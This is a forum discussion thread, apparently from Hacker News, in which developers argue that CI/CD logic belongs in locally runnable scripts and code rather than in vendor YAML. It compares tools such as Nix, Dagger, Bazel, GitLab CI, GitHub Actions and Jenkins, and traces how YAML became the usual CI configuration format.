Same thing with test runners. How are we still stuck in a world where the test runner has its own totally opaque parallelism regime and our only insight is whatever it chooses to dump into XML at the end, which will be probably be nothing if the test executable crashes? Why can't the test runner tell the CI system what all the processes are that it forked off and where each one's respective log file and exit status is expected to be?
Nix really helps with this. Its not just that you do everything via a single script invocation, local or ci, you do it in an identical environment, local or ci. You are not trying to debug the difference between Ubuntu as setup in GHA or Arch as it is on your laptop.
Setting up a nix build cache also means that any artefact built by your CI is instantly available locally which can speed up some workflows a lot.
- Everything sandboxed in containers (works the same locally and in CI)
- Integrate your build tools by executing them in containers
- Send traces, metrics and logs for everything at full resolution, in the OTEL format. Visualize in our proprietary web UI, or in your favorite observability tool
I work on garnix.io, which is exactly a Nix-based CI alternative for GitHub, and we had to build a lot of these small things to make the experience better.
All of that is a lot more than what a local dev would want, deploying to their own private test instance, probably with a bunch of API keys that are read-only or able to write only to other areas meant for validation.
Maybe add some semi-structured log/trace statements for the CI to scrap.
No hooks necessary.
How much better would it be if the CI web client could just say, here's everything the build tool built, with their individual logs, and here's a direct link to the one that failed, which canceled everything else?
But how do you get that sweet, sweet vendor-lock that way? /s
When I joined my first web SaaS startup I had a bit of a culture shock. Everything was running on 3rd party services with their own proprietary config/language/etc. The base knowledge of POSIX/Linux/whatever was almost completely useless.
I'm kinda used to it now, but I'm not convinced it's any better. There are so many layers of abstraction now that I'm not sure anybody truly understands it all.
It blows my mind what is involved in creating a simple web app nowadays compared to when I was a kid in the mid-2000s. Do kids even do that nowadays? I’m not sure I’d even want to get started with all the complexity involved.
If you want to use a framework The React tutorials from Traversy media are pretty good. You can even do cross platform into mobile app with frameworks like React Native or Flutter if you want iOS/Android native apps.
Vite has been a godsend for React/Vue. It’s no longer the circus it was in the mid 2010s. Google’s monopoly has made things easier for web devs. No more babel or polyfill or createReactApp.
People do still avoid frameworks and use raw HTML/CSS/Javascript. HTMX has made sever fetches a lot easier.
You probably want a decent CSS framework for reponsive design. Everyone used to use minimalist ones like Tailwimd have become more popular.
If you need a backend and want to do something simple you can use BaaS (Backend as a service) platforms like Firebase. Otherwise setting up a NodeJS server with some SQL or KV store like SQLLite or MongoDB isn’t too difficult
CI/CD systems exist to streamline testing and deployment for large complex apps. But for individual hobbyist projects it’s not worth it.
It’s demonstrably worse.
> The base knowledge of POSIX/Linux/whatever was almost completely useless.
Guarantee you, 99% of the engineering team there doesn’t have that base knowledge to start with, because of:
> There are so many layers of abstraction now that I'm not sure anybody truly understands it all.
Everything is constantly on fire, because everything is a house of cards made up of a collection of XaaS, all of which are themselves houses of cards written by people similarly clueless about how computers actually operate.
I hate all of it.
Your Jenkins experience is more valuable and worth replicating when you get the opportunity.
Once you get on Dagger, you can turn your CI into minimal Dagger invocations and write the logic in the language of your choice. Runs the same locally and in automation
I personally hold Dagger a bit different from most, by writing a custom CLI and using the Dagger Go SDK directly. This allows you to do more host level commands, as everything in a Dagger session runs in a container (builds and arbitrary commands).
I've adopted the mono/megarepo organization and have a pattern that also includes CUE in the solution. Starting to write that up here: https://verdverm.com/topics/dev/dx
Between that and upgrading for security patches. Developing user impacting code is becoming a smaller and smaller part of software development.
I heavily invested in a local runner based CI/CD workflow. First I was using gogs and drone, now the forgejo and woodpecker CI forks.
It runs with multiple redundancies because it's a pretty easy setup to replicate on decentralized hardware. The only thing that's a little painful is authentication and cross-system pull requests, so we still need our single point of failure to merge feature branches and do code reviews.
Due to us building everything in go, we also decided to have always a /toolchain/build.go so that we have everything in a single language, and don't need even bash in our CI/CD podman/docker images. We just use FROM scratch, with go, and that's it. The only exception being when we need to compile/rebuild our ebpf kernel modules.
To me, personally, the Github Actions CVE from August 2024 was the final nail in the coffin. I blogged about it in more technical detail [1] and guess what was the reason that the TJ actions have been compromised last week? Yep, you guessed right, the same attack surface that Github refuses to fix, a year later.
The only tool, as far as I know, that somehow validates against these kind of vulnerabilities, is zizmor [2]. All other tools validate schemas, not vulnerabilities and weaknesses.
[1] https://cookie.engineer/weblog/articles/malware-insights-git...
[2] https://github.com/woodruffw/zizmor
If you take a look at the pull requests in e.g. the changed-files repo, it's pretty obvious what happened. You can still see some of the malformed git branch names and other things that the bots tried out. There were lots of "fixes" that just changed environment variable names from PAT_TOKEN to GITHUB_TOKEN and similar things afterwards, which kind of just delays the problem until malware is executed with a different code again.
As a snarky sidenote: The Wiz article about it is pretty useless as a forensics report, I expected much more from them. [1]
The conceptual issue is that this is not fixable unless github decides to rewrite their whole CI/CD pipeline, because of the arbitrary data sources that are exposed as variables in the yaml files.
The proper way to fix this (as Github) would be to implement a mandatory linter step or similar, and let a tool like zizmor check the file for the workflow. If it fails, refuse to do the workflow run.
[1] https://www.wiz.io/blog/github-action-tj-actions-changed-fil...
Mise can install all your deps, and run tasks
From dagger.io...
"The open platform for agentic software.
Build powerful, controllable agents on an open ecosystem. Deploy agentic applications with complete visibility and cross-language capabilities in a modular, extensible platform.
Use Dagger to modernize your CI, customize AI workflows, build MCP servers, or create incredible agents."
So now we are trying to capitalize on it, hence the ongoing changes to our website. We are trying to avoid the "something something agents" effect, but clearly, we still have work to do there :) It's hard to explain in marketing terms why a ephemeral execution engine, cross-language component system, deep observability and interactive CLI can be great at running both types of workloads... But we're going to keep trying!
Internally we never thought of ourselves as a CI company, but as an operating system company operating in the CI market. Now we are expanding opportunistically to a new market: AI agents. We will continue to support both, because our platform can run both.
If you are interested, I shared more details here: https://x.com/solomonstre/status/1895671390176747682
The risk of muddling is limited to the marketing, though. It's the exact same product powering both use cases. We would not even consider this expansion if it wasn't the case.
For example, Dagger Cloud implements a complete tracing suite (based on OTEL). Customers use it for observability of their builds and tests. Well it turns out, you can use the exact same tracing product for observability of AI agents too. And it turns out that observability is huge unresolved problem of AI agents! The reason is because, fundamentally, AI agents work exactly like complicated builds: the LLM is building its state, one transformation at a time, and sometimes it has side effects along the way via tool calling. That is exactly what Dagger was built for.
So, although we are still struggling to explain this reality to the market: it is actually true that the Dagger platform can run both CI and AI workflows, because they are built on the same fundamentals.
Or I'll ask v0.dev to reimplement it, but I think it'd be more complete if you did it
I can understand what you're trying to say, but because I don't have clear "examples" at hand which show me why in practice handling such cases are problematic and why your platform makes that smooth, I don't "immediately" see the value-added
For me right now, the biggest "value-added" that I perceive from your platform is just the "CI/CD as code", a bit the same as say Pulumi vs Terraform
But I don't see clearly the other differences that you mention (eg observability is nice, but it's more "sugar" on top, not a big thing)
I have the feeling that indeed the clean handling of "state" vs "side-effects" (and what it implies for caching / retries / etc) is probably the real value here, but I fail to perceive it clearly (mostly because I probably don't (or not yet) have those issues in my build pipelines)
If you were to give a few examples / ELI5 of this, it would probably help convert more people (eg: I would definitely adopt a "clean by default" way of doing things if I knew it would help me down the road when some new complex-to-handle use-cases will inevitably pop up)
They do seem to have a nice "quickstart for CI" they haven't abandoned, yet: https://docs.dagger.io/ci/quickstart
(As much as I personally like working with CI and build systems, it's true there's not a ton of money in it!)
Literally from comment at the root of this thread.
https://www.boringbusinessnerd.com/startups/dagger
Mise indeed isn't, but its scope is quite a bit smaller than Dagger.
A lot of us could learn... do one thing and do it well
target: $(DOCKER_PREFIX) build
When run in gitlab, the DOCKER_PREFIX is a no-op (it's literally empty due to the CI=true var), and the 'build' command (whatever it is) runs in the CI/CD docker image. When run locally, it effectively is a `docker run -v $(pwd):$(pwd) build`.
It's really convenient for ensuring that if it builds locally, it can build in CI/CD.
I let GitHub actions do things like the initial environment configuration and the post-run formatting/annotation, but all of the actual work is done by my scripts:
https://github.com/Hammerspoon/hammerspoon/blob/master/.gith...
https://github.com/williamcotton/webdsl/blob/main/.github/wo...
The other thing I would add is consider passing in all environment variables as args. This makes it easy to see what dependencies the script actually needs, and has the bonus of being even more portable.
Some people here still can’t believe YAML is used for not only configuration, but complex code like optimized CI pipelines. This is insane. You’re actually introducing much needed sanity into the process by admitting that a real programming language is the tool to use here.
I can’t imagine the cognitive dissonance Lisp folks have when dealing with this madness, not being one myself.
After a decade trying to fight it, this one Lisper here just gave up. It was the only way to stay sane.
I remain hopeful that some day, maybe within our lifetimes, the rapid inflation phase of software industry will end, and we'll have time to rethink and redo the fundamentals properly. Until then, one can at least enjoy some shiny stuff, and stay away from the bleeding edge, aka. where sewage flows out of pipe and meets the sea.
(It's gotten a little easier now, as you can have LLMs deal with YAML-programming and other modern worse-is-better "wisdom" for you.)
It would really benefit from a language that intrinsically understood its being used to control a state machine. As it is, that is what nearly all folks want in practice is a way to run different things based on different states of CI.
A lisp DSL would be perfect for this. Macros would make things alot easier in many respects.
Unfortunately, there's no industry consensus and none of the big CI platforms have adopted support for anything like that, they all use variants of YAML (I always wondered who started it with YAML and why everyone copied that, if anyone knows I'd love to read about it).
Honestly, I can say the same complaints hold up against the cloud providers too. Those 'infrastructure as code' SDKs really don't lean into the 'as code' part very well
"Application and configuration should be separate, ideally in separate repos. It is the admin's job to configure, not the developer's"
"I do not need to learn your garbage language to understand how to deploy or test your application"
"...as a matter of fact, I don't need to learn the code and flows of the application itself either - give me a binary that runs. But it should work with stale configs in my repo."
"...I know language X works for the application but we need something more ubiquitous for infra"
Then there was a crossover of three streams, as I would call it:
YAML was emerging "hard" on the shoulders of Rails
Everyone started hating on XML (and for a good reason)
Folks working on CI services (CruiseControl and other early solutions) and ops tooling (chef, ansible) saw JSON's shortcomings (now an entire ecosystem has configuration files with no capability to put in a comment)
Since everybody hated each other's languages, the lowest common denominator for "configuration code" came out to be YAML, and people begrudgingly agreed to use it
The situation then escalated severely with k8s, which adopted YAML as "the" configuration language, and a whole ecosystem of tooling sprung up on top using textual templating (!) of YAML as a layer of abstraction. For k8s having a configuration language was an acute need, because with a compiled language you need something for configuration that you don't have to compile with the same toolchain just to use - and I perfectly "get it" why they settled for YAML. I do also get why tools like Helm were built on top of YAML trickery - because, be it that Helm were written in some other language, and have its charts use that, they would alienate all the developers that either hate that language personally, or do not have it on the list of "golden permitted" at their org.
Net result is that YAML was chosen not because it is good, but because it is universally terrible in the same way for everyone, and people begrudgingly settled on it.
With CI there is an extra twist that a good CI setup functions as a DAG - some tasks can - and should - run in parallel for optimization. These tasks produce artifacts which can be cached and reused, and a well-set CI pipeline should be able to make use of that.
Consequently, I think a possible escape path - albeit an expensive one - would be for a "next gen" CI system to expose those _task primitives_ via an API that is easy to write SDKs for. Read: not a grpc API. From there, YAML could be ditched as "actual code" would manipulate the CI primitives during build.
I know this isn't a definite answer to your question, but it was still super interesting to me and hopefully it will inspire someone else to dig into finding the actual answer
The best guess I have as far as CI/CD specifically appears to be <https://en.wikipedia.org/wiki/Travis_CI#:~:text=travis%20ci%...> which launched in 2011 offering free CI and I found a reference to their .travis.yml in GitLab's repo in 2011, too
- CruiseControl (2004) was "ant as a service," so it was XML https://web.archive.org/web/20040812214609/http://confluence...
- Hudson (2007) https://web.archive.org/web/20140701020639/https://www.java.... was also XML, and was by that point driving Maven 2 builds (also XML)
- I was shocked that GitHub existed in 2008 https://web.archive.org/web/20081230235955/http://github.com... with an especial nod to no longer a pain in the ass and Not only is Git the new hotness, it's a fast, efficient, distributed version control system ideal for the collaborative development of software but this was just "for funsies" link since they were very, very late to the CI/CD game
- I was surprised but k8s 1.0.0 still had references to .json PodSpec files in 2010 https://github.com/kubernetes/kubernetes/blob/v1.0.0/example...
- cloud-init had yaml in 2010 https://github.com/openstack-archive/cloud-init/blob/0.7.0/d... so that's a plausible "it started here" since they were yaml declarations of steps to perform upon machine boot (and still, unquestionably, my favorite user-init thing)
- just for giggles, GitLab 1.0.2 (2011) didn't even have CI/CD https://gitlab.com/gitlab-org/gitlab/-/tree/v1.0.2 -- however, while digging into that I found .travis.yml in v2.0.0 (also 2011) so that's a very plausible citation <https://gitlab.com/gitlab-org/gitlab/-/blob/v2.0.0/.travis.y...>
- Ansible 1.0 in 2012 was also "execution in yaml" https://github.com/ansible/ansible/blob/v1.0/examples/playbo...
I've been using YAML for ages and I never had any issue with it. What do you think is wrong with YAML?
Many of us would rather use a less terrible programming language instead.
Some people talk about YAML being a turing complete language, if people try to do that in your CI/CD system just fire them
I'll allow helm style templating but that's about it.
It's miles better than Jenkins and the horrors people created there. GitLab CI can at least be easily migrated to any other GitLab instance and stuff should Just Work because it is in the end not much more than self contained bash scripts, but Jenkins... is a clown show, especially for Ops people of larger instances. On one side, you got 50 plugins with CVEs but you can't update them because you need to find a slot that works for all development teams to have a week or two to fix their pipelines again, and on the other side you got a Jenkins instance for each project which lessens the coordination effort but you gotta worry about dozens of Jenkins instances. Oh and that doesn't include the fact many old pipelines aren't written in Groovy or, in fact, in any code at all but only in Jenkins's UI...
Github Actions however, I'd say for someone coming from GitLab, is even worse to work with than Jenkins.
Instead of wrapping the aws cli command I wrote small Go applications using the boto3 library.
Removed the headaches when passing in complex params, parsing output and and also made the logic portable as we need to do the builds on different platforms (Windows, Linux and macOS).
I have seen people doing absolutely insane setups because they thought they have to do it in yaml and pipeline and there is absolutely no other option or it is somehow wrong to drop some stuff to code.
I'm not sure I understood what you're saying because it sounds too absurd to be real. The whole point of a CICD pipeline is that it automates all aspects of your CICD needs. All mainstream CICD systems support this as their happy path. You specify build stages and build jobs, you manage your build artifacts, you setup how things are tested, deployed and/or delivered.
That's their happy path.
And you're calling the most basic usecases of a standard class if tools as "insanity"?
Please help me explain what point you are trying to make.
All aspects of your CICD pipeline - rebasing PRs is not 'basic CICD' need.
CICD pipeline should take a commit state and produce artifacts from that state, not lint and not autofix trivial issues.
Everything that is not "take code state - run tests - build - deploy (eventualy fail)" is insanity.
Autofixing/linting for example should be separate process waay before CICD starts. And people do stuff like that because they think it is part of integration and testing. Trying to shove it inside is insanity.
This is the dumbest thing I see installers do a lot lately.
It tends to be that folks want to shoehorn some technology into the pipeline that doesn't really fit, or they make these giant one shot configurations instead of running multiple small parallel jobs by setting up different configurations for different concerns etc.
It's really easy to extend and compose jobs, so it's simple to unit test your pipeline: https://gitlab.com/nunet/test-suite/-/tree/main/cicd/tests?r...
This way I can code my pipeline and use the same infrastructure to isolate groups of jobs that compose a relevant functionality and test it in isolation to the rest of the pipeline.
I just wish components didn't have such a rigid opinion on folder structure, because they are really powerful, but you have to adopt gitlab prescription
I maintained a Javascript project that used Make and it just turned into a mess. We simply changed all of our `make some-job` jobs into `./scripts/some-job.sh` and not only was the code much nicer, less experienced developers were suddenly more comfortable making changes to scripts. We didn't really need Make to figure out when to rebuild anything, all of our tools already had caching.
The main argument I wanted to make is that it works very well to just use GitHub actions to execute your tool of choice.
It allows you to define a central interface into your project (largely what I find people justify using Make for), but smoothes out so many of the weird little bumps you run into from "using Make wrong."
Plus, you can an any point just drop into running a script in a different language as your command, so it basically "supports bash scripts" too.
https://github.com/casey/just
So if even remotely possible we write all CI as a single 'one-click' script which can do it all by itself. Makes developing/testing the whole CI easy. Makes changing between CI implementations easy. Can solve really nasty issues (think: CI is down, need to send update to customer) easily because if you want a release you just build it locally.
The only thing it won't automaticaly do out of the box is being fast, because obviously this script also needs to setup most of the build environment. So depending on the exact implementation there's variation in the split between what constitutes setting up a build environment and running the CI script. As in: for some tools our CI scripts will do 'everything' so starting from a minimal OS install. Whereas others expect an OS with build tools and possibly some dependencies already available.
https://www.joelonsoftware.com/2000/08/09/the-joel-test-12-s...
Yes, a thousand time.
Deploy scripts are tougher to deal with, as they'll naturally rely on a flurry of environment variables, protected credentials etc.
But for everything else writing the script for local execution first, and generalizating them for CI one they run well enough is the absolute best approach. It doesn't even need to run in the local shell, having all the CI stuff in a dedicated docker image is fine if it requires specific libraries or env.
- Treat pipelines as code. - Make pipelines parts composable, as code. - Be mindful of vendor lock-in and/or lack of portability (it is a trade-off).
For on-promise: if you're already deeply invested in running your own infrastructure, that seems like a good fit.
When thinking about how we build Namespace -- there are parts that are so important that we just build and run internally; and there are others where we find that the products in the market just bring a tremendous amount of value beyond self-hosting (Honeycomb is a prime example).
Use the tools that work best for you.
I fully agree with the recommendation to use maintainable code. But that effectively rules out shell scripts in my oppinion. CI shell scripts tend to become big ball of mud rather quickly as you run into the limitations of bash. I think most devs only have superficial knowledge of shell scripts, so do yourself a favor and skip them and go straight to whatever language your team is comfortable with.
One can learn to use it to the point where it's usable to do advanced automation... but why, when there are so many better options available?
The second one has been, from someone else: if you can use anything else than bash, do that.
Jokes aside... it's so trendy to bash bash that it's not funny anymore. Bash is still quite reliable for work that usually gets done in CI, and nearly maintenance free if used well.
THIS 10000% percent.
My personal favourite solution is Bazel specifically because it can be so isolated from those layers.
No need for Docker (or Docker in Docker as many of these solutions end up requiring) or other exotic stuff, can produce OCI image artifacts with `rules_oci` directly.
By requiring so little of the runner you really don't care for runner features, you can then restrict your CI/CD runner selection to just reliability, cost, performance and ease of integration.
That's also a very valid takeaway for life in general
- I would go even further: Do not use bash/python or any duck-typed lang. (only for simple projects, but better just dont get started). - Leverage Nix (!! no its not a joke ecosystem) : devshells or/and build devcontainers out of it. - Treat tooling code, ci code, the exact same as your other code. - Maybe generate the pipeline for your YAML based CI system in code. - If you use a CI system, gitlab, circle etc, use one which does not do stupid things with your containers (like Github: 4 years! old f** up: https://github.com/actions/runner/issues/863#issuecomment-25...)
Thats why we built our own build tool which does that, or at least helps us doing the above things:
https://github.com/sdsc-ordes/quitsh
- I would go even further: Do not use bash/python or any duck-typed lang. (only for simple projects, but better just dont get started).
- Leverage Nix (!! no its not a joke ecosystem) : devshells or/and build devcontainers out of it.
- Treat tooling code, ci code, the exact same as your other code.
- Maybe generate the pipeline for your YAML based CI system in code.
- If you use a CI system, gitlab, circle etc, use one which does not do stupid things with your containers (like Github: 4 years! old f** up: https://github.com/actions/runner/issues/863#issuecomment-25...). Also one which lets you run dynamically generated pipelines.
Thats why we built our own build tool which does that, or at least helps us doing the above things:
https://github.com/sdsc-ordes/quitsh
Each systemd service could represent a step built by running a script, and each service can say what it depends on, thus helping parallelize any step that can be.
I have not found anyone trying that so far. Is anybody aware of something similar and more POSIX/cross platform that allows writing a DAG of scripts to execute?
Doesn’t matter Jenkins or actions - it is just complicated. Making it simpler is on devs/ops not the tool.
Facts.
However I’ll go a step further and say “only implement your logic in a tool that has a debugger”.
YAML is the worse. But shell scripts are second worst. Use a real language.
That said, if you absolutely need to use shell script for reasons, keep it all in single script, define logging functions including debug logs, rigorously check every constraint and variable, use shellcheck, factor the code well into functions - I should sometimes write a blog post about it.
Unfortunately, this isn't a good plan going forward... :( Going forward I'd wish for a tool that's as ubiquitous as Git, has good integration with editors like language servers, can be sold as a service or run completely in-house. And it would allow defining the actions of the automated builds and tests, have a way of dealing with releases, expose interface for collecting statistics, integrate with bug tracing software for the purpose of excluding / including tests in test runs, allowed organizing tests in groups (eg. sanity / nightly / rc).
The problem is that tools today don't come anywhere close to being what I want for CI, neither free nor commercial tools aren't even going in the desired direction. So, the best option is simply to minimize their use.
- mise for lang config
- direnv for environment loading
- op for secret injection
- justfile for lint, build, etc
Here's a template repo that I've been working on that has all of this implemented:
https://github.com/iloveitaly/python-starter-template
It's more complex than I would like it to be, but it's consistent and avoids having to deal with GHA too much.
I've also found having a GHA playground is helpful:
https://github.com/iloveitaly/github-action-playground
Why does YAML have any traction when JSON is right there? I'm an idiot amateur and even I learned this lesson; my 1 MB YAML file full of data took 15 seconds to parse each time. I quickly learned to use JSON instead, takes half a second.
Because it has comments, which are utterly essential for anything used as a human readable/writable configuration file format (your use case, with 1 MB of data, needs a data interchange format, for which yes JSON is at least much better than YAML).
YAML has comments. YAML is easily & trivially written by humans. JSON is easily & trivially written by code.
My lesson learned here? When generating YAML, instead generate JSON. If it's meant to be read and updated by humans, use something that can communicate to the humans (comments). And don't use YAML as a data interchange format.
For short configs, YAML is acceptable-ish. For anything longer I'd take TOML or something else.
However, CI is not "configured", it is coded. It is simply the wrong tool. YAML was continuously extended to deal with that, so it developed into much more than just "markup", but it grew into this terrible chimera. Once you start using advanced features in GitLab's YAML like anchors and references to avoid writing the same stuff again and again, you'll notice that the whole tooling around YAML is simply not there. How does the resulting YAML look like? How do you run this stuff locally? How do you debug this? Just don't go there.
You will not be able to avoid YAML completely, obviously, but use it the way it was originally intended to.
Finally! I was always struggling to explain to others why YAML is OK-ish as a language, but then never seems to work well for the things people tried doing with it. Especially stuff that needs to run commands, such as CI.
> How does the resulting YAML look like? How do you run this stuff locally? How do you debug this? Just don't go there.
Agreed. GitHub actions, or any remote CI runner for that matter, makes the problem even worse. The whole cycle of having to push CI code, wait 10 minutes while praying for it to work, still getting an error, trying to figure out the mistake, fixing one subtle syntax error, then pushing the code again in the hope that that works is just a terrible workflow. Massive waste of time.
> You will not be able to avoid YAML completely, obviously, but use it the way it was originally intended to.
Even for configurations YAML remains a pain, unfortunately. It could have been great for configs, but in my experience the whole strict whitespace (tabs-vs-spaces) part ruined it. It isn't a problem when you work from an IDE that protects you from accidentally using tabs (also, auto-formatting for the win!) but when you have to write YAML configuration (for example: Netplan) on a remote server using just an editor it quickly becomes a game of whack-a-mole.
I don't understand what problem you could possibly be experiencing. What exactly do you find hard about running commands in, say, GitLab CICD?
iterating a GitHub Actions workflow is a gigantic pain in the ass. Capturing all of the important logic in a script/makefile/whatever means I can iterate it locally way faster and then all I need github to do is provision an environment and call my scripts in the order I require.
What's wrong with this?
https://docs.github.com/en/actions/writing-workflows/choosin...
What exactly do you find hard in writing your own scripts with a scripting language? Surely you are not a software developer who feels conditionals and variable substitutions are hard.
> it ends up being 20 steps in a language that isn't shell but is calling shell over and over again, and can't be run outside of CI.
Why are you writing your CICD scripts in a way that you cannot run them outside of a CICD pipeline? I mean, you're writing them yourself, aren't you? Why are you failing to meet your own requirements?
If you have a requirement to run your own scripts outside of a pipeline, how come you're not writing them like that? It's CICD 101 that those scripts should be runnable outside of the pipeline. From your description, you're failing to even follow the most basic recommendations and best practices. Why?
That doesn't sound like a YAML problem, does it?
In order to use this domain-specific language properly, you first must learn it, and learning YAML is but a small part of that. Moreover, it is not immediately obvious that, once you know it, you actually want to avoid it. But you can't avoid it entirely, because it is the core language of the CI/CD platform. And you can't know how to avoid it effectively until you have spent some time just using it directly. Simplicity comes from tearing away what is unnecessary, but to discern necessary from unnecessary requires judgment gained by experience. There is no world in which this knowledge transfers immediately, frictionlessly, and losslessly.
Furthermore, there is a lot that GitHub (replace with platform of choice) could have done to make this better. They largely have no incentive to do so, because platform lock-in isn't a bad thing to the platform owner, and it's a nontrivial amount of work on their part, just as it is a nontrivial amount of work on your part to learn and use their platform in a way that doesn't lock you into it.
A: Easy! You just spin up a Kubernetes pod with Alpine image, map a couple of files inside, run a bash script of "date" with some parameters, redirect output to a mapped file, and then read the resulting file. That's all. Here's a YAML for you. Configuration, baby!
(based on actual events)
(Iterating even on this stuff by waiting for the runner is still annoying though. You need to commit to the repo, push, and wait. Hence the suggestion of having scripts that you can also run locally, so you can test changes locally when you're iterating on them. This isn't any kind of guarantee, but it's far less annoying to do (say) 15 iterations locally followed by the inevitable extra 3 remotely than it is having to do all 18 remotely, waiting for the runner each time then debugging it by staring at the output logs. Even assuming you'd be able to get away with as few as 15 given that you don't have proper access to the machine.)
Where?
https://docs.github.com/en/actions/writing-workflows/choosin...
> don't have anything particularly interesting in the .yml file, just the bare minimum plus some small number of uncomplicated script invocations to install dependencies and actually do the build
It is a very basic "how to" with no recommendations.
Moreover, they directly illustrate a bad practice:
This is not running two scripts, this is running a shell command that invokes two scripts, and has no error handling if the first one fails. If that's the behavior you want, fine, but then put it in one shell script, not two. What am I supposed to do with this locally? If the first shell script fails, do I need to fix it, or do I just proceed on to the second one?This is invoking a shell and that's how shells typically work, one command at a time. Would it make you feel better if they added && or used a step like they also recommend to split these out? You can put the error handling in your script if need be, that's on you or the reader, most CI agents only understand true/false or in this case $?.
Nobody said they want that behavior, they're showing you the behavior. They actually show you the best practice behavior first, not sure if you didn't read that or are purposely omitting it. In fact, the portion you highlight, is talking about permissions, not making suggestions.
That page is just one small part of a much larger reference document, and it doesn't seem opinionated at all to me. Plus there are dozens of other examples elsewhere in the same reference that are not simple invocations of one shell script and nowhere are you admonished not to do things that way.
No, it really isn't. I'll clarify why.
Pretty much all pipeline services share the same architecture pattern:
* A pipeline run is comprised of one or more build jobs,
* Pipeline runs are triggered by external events
* Build jobs have contexts and can output artifacts,
* Build jobs are grouped into stages,
* Stages are organized as a directed graph,
* Transitions between stages in the directed graph is ruled by a set of rules, some supported by default (i.e., if a job fails then the stage fails) complemented by custom rules (manual or automatic approvals, API tests, baking periods, etc).
This is the textbook scenario ideal for DSLs. You already are bound to an architecture pattern, this there is no point of reinventing the wheel each time. Just specify your stages and which jobs run as part of each stage, manage artifacts and promotion logic, and you're done.
You do not need to take my word for it. Take a look at GitLab CICD for a pipeline with build, test, and delivery stage. See what a mess you will put together if you support the same feature set with whatever scripting language you choose. There is no discussion or debate.
The problem starts when that graph cannot be determined in advance and needs to be computed in runtime. It's a bit better when it's possible to compute that graph as a first step, and it's a lot worse when one needs to do a couple of stages before being able to compute the next elements of the graph. The graph computation is terrible enough in e.g. Groovy, but having to do it in YAML is absolutely horrendous.
> Take a look at GitLab CICD for a pipeline with build, test, and delivery stage
Yeah, if your workflow fits in a kindergarten example of "build, test, and delivery", then yeah, it's YAML all the way baby. Not everyone is so fortunate.
Wrapping it in a DSL encoded as YAML has zero benefit other than it being easier for a team with weak design skills to implement and harder for users to migrate off of.
Pardon my pedantry, but the meaning of YAML's name was changed from the original “Yet Another Markup Language” to “YAML Ain't Markup Language” in a 2002 draft spec because YAML is, in fact, not a markup language :)
Compare:
https://yaml.org/spec/history/2001-12-10.html
https://yaml.org/spec/history/2002-04-07.html
Brings to mind the classic "Kingdom of Nouns" [0] parable, which I read to my kid just last week. The multi-line "run" nodes in GitHub actions give me the heebie-jeebies, like how MUMPS data validation was maintained in metadata of VA-Fileman [1].
0. https://steve-yegge.blogspot.com/2006/03/execution-in-kingdo...
1. https://www.hardhats.org/fileman/pm/gfs_frm.htm
I will take the Actions path 100% of the time. Building your own action is so insanely simple it makes me wonder if the people complaining about YAML understand the tooling because it's entirely avoidable. It also coincides with top comments about coding your own CI, if you're just "using" YAML you're barely touching the surface.
* Very easy to write the code you didn't mean to, especially in the context of CI where potentially a lot of languages are going to be mixed, a lot of quoting and escaping. YAML's string literals are a nightmare.
* YAML has no way to express inheritance. Nor does it have a good way to express variables. Both are usually desperately needed in CI scripts, and are usually bolted on top with some extra-language syntax (all those dollars in GitHub actions, Helm charts, Ansible playbooks etc.)
* Complexity skyrockets compared to the size of the file. I.e. in a language like C you can write a manageable program with millions of lines of code. In YAML you will give up after a few tens of thousands of lines (similar to SQL or any other language that doesn't have modules).
* Whitespace errors are very hard to spot and fix. Often whitespace errors in YAML result in valid YAML which, however, doesn't do what you want...
2. Trying to encode logic and control flow in a YAML document is much more difficult than writing that flow in a "real" programming language. Debugging is especially much easier in "real" languages.
YAML is great for the happy-flow where everything works. It's absolutely terrible for any other flow.
MSBuild, for example, is all XML, but it has debugging support in Visual Studio complete with breakpoints and expression evaluation.
It's a DSL. There is no execution, only configuration. The only thing that's executed are the custom scripts you create yourself, and any intro tutorial on the subject will eventually teach you that if you want to run anything beyond a single straight-forward command then you should move those instructions to a shell script to make them testable and reproducible.
Things are so simple and straight forward that you need to go way out of your way to create your own problems.
I wonder how many people in this discussion are blaming the tools when they even bothered to learn the very basics.
> It's a DSL. There is no execution, only configuration.
Jenkins pipelines are also DSL. I still can print out debugging information from them. "It's a DSL" is not an excuse for being a special case of shitty DSL.
> any intro tutorial on the subject will eventually teach you
Do these tutorials have a chapter on what to do when you join a company with 500 engineers and a ton of YAMLs that are not written in that way?
> you should move those instructions to a shell script to make them testable
Yeah, no. How am I supposed to test my script that is supposed to run on Github-supplied runner with a ton of injected secrets and Github-supplied JSON of 10,000 lines, when I don’t have the runner, the secrets, or the JSON?
The YAML is fed into an agent which reads it to decide what to execute. Any time you change the control flow of a system by changing data, you are doing a form of programming.
For example: Stripe uses constants for types of tax registration numbers (VAT/GST/TIN, etc.). So there is EU_VAT for European VAT numbers, US_TIN for US tax identification numbers, etc. But what value to use for tax-exempt organisations that don't have a tax number? Well... guess how I found out about NO_VAT...
On the bright side, I did learn that way that although Norway is in the Schengen zone, apparently they are not part of the EU (hence the separation of EU_VAT and NO_VAT). I guess the 'no' name collision has taught many developers something about Norway :-)
It would be better to delete your comment so nobody else has to has to ever have this crisis.
Why? I understand it in cases where security is critical or intellectual property is at stake. Are you talking about "snowflake runners" or just dumb executors of container images?
With self hosted Gitlab runners it was almost as fast as doing incremental builds. When your build process can take like 15-20 minutes (medium sized C++ code base), this brought down the total time to 30 seconds or so.
Imagine building Android - even "cloning the sources" is 200GB of data transfer, build times are in hours. Not having to delete the previous sources and doing an incremental build saves a lot of everything.
tldr; "A cache is one or more files a job downloads and saves. Subsequent jobs that use the same cache don’t have to download the files again, so they execute more quickly."
It will probably still be slower than a dedicated runner, but possibly require less maintenance ("pet" runner vs "cattle" runner).
Security is another thing where this can come in handy, but properly firewalling CI runners and having mirrors of all your dependencies is a lot of work and might very well be overkill for most people.
Buy a cheap Ryzen, and put it on your desk, that's a cheap runner.
So many times I was biting my fingers not being able to figure out the problems GitHub runners were having with my actions and was unable to investigate.
This so much. This ties into the previous point about using as much shell as possible. Additionally I'd say environment control via Docker/Nix, as well as modularizing the pipeline so you can restart it just before the point of failure instead of rerunning the whole business just to replay one little failure.
To put the first 3 points into different words: you should treat the CI only as a tool that manages the interface and provides interaction with the outside world (including injecting secrets/configuration, setting triggers, storing caches etc.) and helps to visualize things.
Unfortunately, to do that, it puts constraints on how you can use it. Apart from that, no logic should live in the CI.
To an extent, yes. There should be one command to build, one to run tests, etc.
